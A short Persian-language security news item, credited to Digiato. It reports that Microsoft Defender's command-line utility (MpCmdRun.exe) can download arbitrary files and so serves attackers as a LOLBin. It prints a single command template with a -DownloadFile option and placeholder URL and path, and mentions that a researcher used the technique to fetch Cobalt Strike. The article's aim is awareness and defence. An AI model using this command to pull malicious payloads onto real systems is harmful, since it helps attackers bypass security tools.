دانلود بدافزار توسط آنتی ویروس ویندوز 10: یک محقق امنیتی به نام Mohammad Askar میگوید تغییرات در ابزار Command Line مایکروسافت دیفندر به هکرها اجازه میدهد تا از این آنتی ویروس به عنوان LOLBin استفاده کنند. به آن دسته از فایلهای معتبر سیستم عامل که میتوان از آنها برای اهداف خرابکارانه استفاده کرد، LOLBin گفته میشود. LOLBINها در ویندوز ۱۰ وجود داشته و هر کدام از آنها عملکرد غیرخرابکارانه دارند، اما هکرها با دسترسی غیرمجاز میتوانند از این فایلها برای دور زدن سپرهای امنیتی و حمله به کامپیوتر بدون اطلاع کاربر استفاده کنند.
آنتی ویروس ویندوز 10
آنطور که Askar میگوید، ابزار Command Line مایکروسافت دیفندر حالا از دستور جدیدی به نام DownloadFile- پشتیبانی میکند. این تغییر احتمالاً در نسخه 4.18.2007.9 یا 4.18.2009.9 این نرم افزار رخ داده است. هکرها با نفوذ به شبکه محلی میتوانند با استفاده از ابزار Microsoft Anti malware Service Command Line Utility و دستور زیر فایل مخرب را دانلود کنند:
<MpCmdRun.exe -DownloadFile -url <url> -path <local-path
محقق امنیتی یاد شده با استفاده از این تکنیک بدافزاری به نام Cobalt Strike را مستقیماً بوسیله مایکروسافت دیفندر دانلود کرد. دیفندر قادر به شناسایی و حذف فایلهای مخرب دانلود شده با استفاده از این روش است، اما مشخص نیست دیگر نرم افزارهای آنتی ویروس نیز قادر به دفاع از سیستم در برابر فایلهای مخرب دانلود شده از این روش هستند یا خیر. به متخصصین شبکه توصیه میشود تا این LOLBin را در لیست خود قرار دهند تا از حمله احتمالی جلوگیری شود.
منبع خبر: دیجیاتو